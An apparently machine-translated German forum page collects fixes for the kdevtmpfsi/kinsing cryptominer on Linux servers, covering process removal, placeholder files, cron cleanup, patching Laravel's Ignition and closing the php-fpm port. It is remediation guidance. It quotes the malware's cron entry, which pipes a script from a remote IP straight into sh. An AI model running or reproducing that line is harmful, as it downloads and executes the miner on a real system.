GNU/Linux >> LINUX-Kenntnisse >  >> Linux

kdevtmpfsi nutzt die gesamte CPU

Die hier erwähnte Lösung hat bei uns funktioniert. Sie erstellen die Dateien, die der Miner verwendet, grundsätzlich ohne Rechte, sodass der Miner sie nicht erstellen und verwenden kann.https://github.com/docker-library/redis/issues/217

touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing

echo "everything is good here" > /tmp/kdevtmpfsi

echo "everything is good here" > /var/tmp/kinsing

touch /tmp/zzz

echo "everything is good here" > /tmp/zzz

chmod go-rwx /var/tmp

chmod 1777 /tmp

Ich hatte das gleiche Problem mit Laravel in Centos 8. Dies sind die Schritte, die ich befolgt habe, um die Malware zu entfernen und das System zu patchen.

Entfernen der Malware aus Systemschritten:Schritt 1:

Entfernen Sie die Malware:
Beenden Sie die beiden Prozesse (kdevtmpfsi und kinsing -Sie können den gleichen Namen haben, aber mit zufälligen Zeichen am Ende-) mit htop oder jeder andere Prozessmanager.

htop F3 zum Suchen von Diensten kdevtmpfsi und kinsing

Verwenden Sie Folgendes, um die Dateien zu finden und zu löschen:

# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;

Die Ausgabe sollte wie folgt aussehen:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Schritt 2:

Nach einem Cron-Job suchen:
Überprüfen Sie, ob es einen Cron-Job gibt, der die Malware neu initialisiert.
Ich habe meine gefunden in:/var/spool/cron/apache>

UBUNTU /var/spool/cron/crontabs/www-data

Es beinhaltete Folgendes:
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

Schritt 3:

Neue Dateien erstellen und schreibgeschützt machen: 

# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing

Laravel-Projekt patchen:Schritt 1:

Schalten Sie APP_DEBUG aus:
Stellen Sie sicher, dass APP_DEBUG Attribut ist false in .env denn so bekommt die Schwachstelle Zugriff.

Schritt 2:

Zündung aktualisieren:
Aktualisieren Sie die Zündung auf eine Version höher als 2.5.1 um sicherzustellen, dass die Schwachstelle gepatcht wird.
Führen Sie Folgendes in Ihrem Projektordner aus:

$ composer update facade/ignition

Ich habe einige Tage mit diesem Miner gekämpft und in meinem Fall war es der php-fpm:9000 Hafen ausgesetzt.
Ich denke, es ist möglich, auf diese Weise Code aus der Ferne einzufügen.

Wenn Sie also docker verwenden mit php-fpm , nicht ausführen Ihren Container auf diese Weise:

docker run -v /www:/var/www -p 9000:9000 php:7.4

Entfernen Sie die Portzuordnung:-p 9000:9000 .

Vergessen Sie nicht, Ihre Container neu zu erstellen und neu zu starten.

Weitere Details hier:https://github.com/laradock/laradock/issues/2451#issuecomment-577722571


Linux

  1. Fehlerbehebung mit dem proc-Dateisystem unter Linux

  2. Verwenden der Kraft in der Linux-Befehlszeile

  3. Ssh – Wie beschleunigt man die zu langsame SSH-Anmeldung?

  4. Ausführen einer Qt-App über das Web

  5. Was ist der Overhead bei der Verwendung von Subshells?

So zeigen Sie Linux-CPU-Informationen mit CPUFetch an

Hier erfahren Sie, wie Sie Netflix unter Linux mit Firefox ansehen

Eine einfache Möglichkeit, den IOStat-Befehl zu verstehen

Tutorial zur Verwendung des Timeout-Befehls unter Linux

Verwendung des SiteLock-Vertrauenssiegels

Verwendung der cPanel-Video-Tutorials